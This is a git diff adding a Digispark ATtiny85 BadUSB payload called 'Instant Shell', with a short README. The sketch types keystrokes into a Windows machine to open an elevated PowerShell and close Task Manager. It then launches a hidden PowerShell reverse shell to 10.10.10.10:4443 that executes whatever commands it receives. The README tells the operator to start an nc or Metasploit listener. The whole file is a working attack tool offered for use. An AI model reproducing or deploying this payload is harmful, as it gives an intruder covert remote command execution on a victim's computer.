diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino
new file mode 100644
index 0000000..6481d5b
--- /dev/null
+++ b/payloads/Instant Shell/Instant_Shell.ino
@@ -0,0 +1,33 @@
+#include "DigiKeyboard.h"
+#define KEY_TAB 0x2b
+void setup() {
+ pinMode(1, OUTPUT); //LED on Model A
+}
+void loop() {
+ DigiKeyboard.update();
+ DigiKeyboard.sendKeyStroke(0);
+ DigiKeyboard.delay(3000);
+
+ DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
+ DigiKeyboard.delay(500);
+ DigiKeyboard.println("taskmgr"); //starting taskmgr
+ DigiKeyboard.delay(5000);
+ DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT);
+ DigiKeyboard.sendKeyStroke(KEY_N);//run
+ DigiKeyboard.delay(2000);
+ DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell
+ DigiKeyboard.sendKeyStroke(KEY_TAB);
+ DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges
+ DigiKeyboard.sendKeyStroke(KEY_ENTER); //run
+ DigiKeyboard.delay(5000);
+ DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager
+ DigiKeyboard.delay(2000);
+ DigiKeyboard.println("cmd");//run cmd
+ DigiKeyboard.delay(2000);
+ DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
+ DigiKeyboard.delay(5000);
+ digitalWrite(1, HIGH); //turn on led when program finishes
+ DigiKeyboard.delay(90000);
+ digitalWrite(1, LOW);
+ DigiKeyboard.delay(5000);
+}
diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md
new file mode 100644
index 0000000..c08889a
--- /dev/null
+++ b/payloads/Instant Shell/README.md
@@ -0,0 +1,13 @@
+# Instant Shell
+
+### Description:
+
+#### 1: Install_Shell.ino:
+Starting instant shell to an attacker machine in less than 1 minute.
+
+**Instuctions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.
+
+**Tested on:**
+**OS**: Windows 10|11
+**User**: Admin/Normal User
+**Hardware**: ATtiny85